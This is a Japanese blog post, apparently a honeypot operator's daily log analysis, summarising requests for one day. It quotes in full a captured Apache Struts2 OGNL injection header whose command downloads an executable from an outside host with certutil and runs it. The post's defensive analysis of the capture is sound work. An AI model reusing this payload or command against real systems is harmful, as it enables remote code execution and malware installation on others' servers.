honeypotの簡易解析9日目

WOWHoneypotのaccess_logよりcsvを生成するスクリプトを作成しました。

今まで一通りlogを舐めてましたが、気になったものしか見なさそうです。

2019-04-09のアクセス数は62件でした。

■送信元IPアドレスの数は 47件です。

■メソッドの一覧と件数は以下です。

method総数 – method
CONNECT1
GET60
POST1
合計 結果62

■アクセスパス一覧と件数は以下です。

pathmethod総数 – path
/ GET39
/.well-known/security.txtGET1
//ldskflksGET1
/cms//?author=1GET1
/cms//wp-json/wp/v2/users/GET1
/cms/wp-login.phpGET1
/cms1//?author=1GET1
/cms1//wp-json/wp/v2/users/GET1
/cms1/wp-login.phpGET1
/favicon.icoGET3
/index.actionGET1
/index.doGET1
/manager/htmlGET4
/robots.txtGET1
/sitemap.xmlGET1
/struts2-rest-showcase/orders.xhtmlGET1
/tmUnblock.cgiPOST1
/versionGET1
api.ipify.org:443CONNECT1

気になるlog

51〜53件目。struts2の脆弱性を突き、http[:]//fid.hognoob.se/download[.]exeをダウンロード。

[2019-04-09 19:13:49+0900] 121.28.9.7 ほげ:80 "GET /struts2-rest-showcase/orders.xhtml HTTP/1.1" 200 FalseGET /struts2-rest-showcase/orders.xhtml HTTP/1.1
Connection: Keep-Alive
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe C:/Windows/temp/hzzwihsvgsdbmlk23163.exe & cmd.exe /c C:/Windows/temp/hzzwihsvgsdbmlk23163.exe').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Accept: */*
Accept-Language: zh-cn
Referer: http://ほげ:80/struts2-rest-showcase/orders.xhtml
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: ほげ

下の部分でwindowsかlinuxを判別しています。

(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})

以下の記事が参考になります。

https://www.morihi-soc.net/?p=654

virustotalはこちら

この前ちょっと解析したやつと同じだな。